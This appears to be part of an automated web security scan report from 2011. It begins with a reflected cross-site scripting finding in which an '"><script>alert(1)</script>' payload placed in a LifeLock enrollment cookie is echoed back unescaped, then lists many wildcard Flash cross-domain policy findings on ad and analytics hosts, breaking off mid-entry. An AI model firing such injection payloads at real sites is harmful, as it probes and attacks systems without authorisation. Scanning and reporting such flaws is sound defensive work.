Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1358800"><script>alert(1)</script>8aee1f6f841; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:45 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bc5461a6bc59c952ded36dc474d908a43ec073d706939dfc4db397c1; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32728

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1358800"><script>alert(1)</script>8aee1f6f841" class="enroll-now">
...[SNIP]...

6. Flash cross-domain policy
There are 40 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://2byto.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://2byto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2byto.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:40 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Last-Modified: Mon, 08 Mar 2010 00:38:12 GMT
ETag: "10000000fc553-145-4813f47ac1b42"
Accept-Ranges: bytes
Content-Length: 325
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.2. http://4.bp.blogspot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://4.bp.blogspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 4.bp.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Sun, 24 Apr 2011 03:14:44 GMT
Expires: Mon, 25 Apr 2011 03:14:44 GMT
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:14:44 GMT
Server: fife
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400, no-transform
Age: 34168

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.3. http://ad.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 12:37:00 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sun, 24 Apr 2011 12:29:26 GMT
X-Varnish: 2161408220 2161275960
Age: 21142
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

6.4. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 24 Apr 2011 04:08:22 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.5. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 02:27:33 GMT
Date: Sun, 24 Apr 2011 02:27:33 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 36488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.6. http://analytic.hotelclub.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.7. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 09:16:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

6.9. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.10. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.11. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sun, 24 Apr 2011 12:33:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.12. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sun, 24 Apr 2011 03:16:36 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.13. http://clk.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.14. http://ctix8.cheaptickets.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:90b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 12:09:47 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.15. http://data.coremetrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:17 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "342dd0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=805
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.16. http://ec.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 486563
Date: Sun, 24 Apr 2011 12:29:09 GMT
Expires: Mon, 25 Apr 2011 21:19:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.17. http://event.adxpose.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sun, 24 Apr 2011 12:30:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

6.18. http://exch.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://exch.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: exch.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 25 Apr 2011 12:37:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 24 Apr 2011 12:37:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.19. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:37:13 GMT
Expires: Thu, 21 Apr 2011 00:36:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 41556
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.20. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.21. http://img1.wsimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:06 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.22. http://img3.wsimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:04 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.23. http://m.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.24. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19982
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.25. http://roia.biz/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://roia.biz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: roia.biz

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:22:22 GMT
Content-Type: text/x-cross-domain-policy
Content-Length: 175
Last-Modified: Tue, 25 Nov 2008 04:11:55 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.26. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 23 Apr 2011 21:09:03 GMT
Expires: Thu, 21 Apr 2011 21:08:15 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 55682
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://spe.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sun, 01 May 2011 11:58:17 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://switch.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://tracking.keywordmax.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.keywordmax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tracking.keywordmax.com

Response

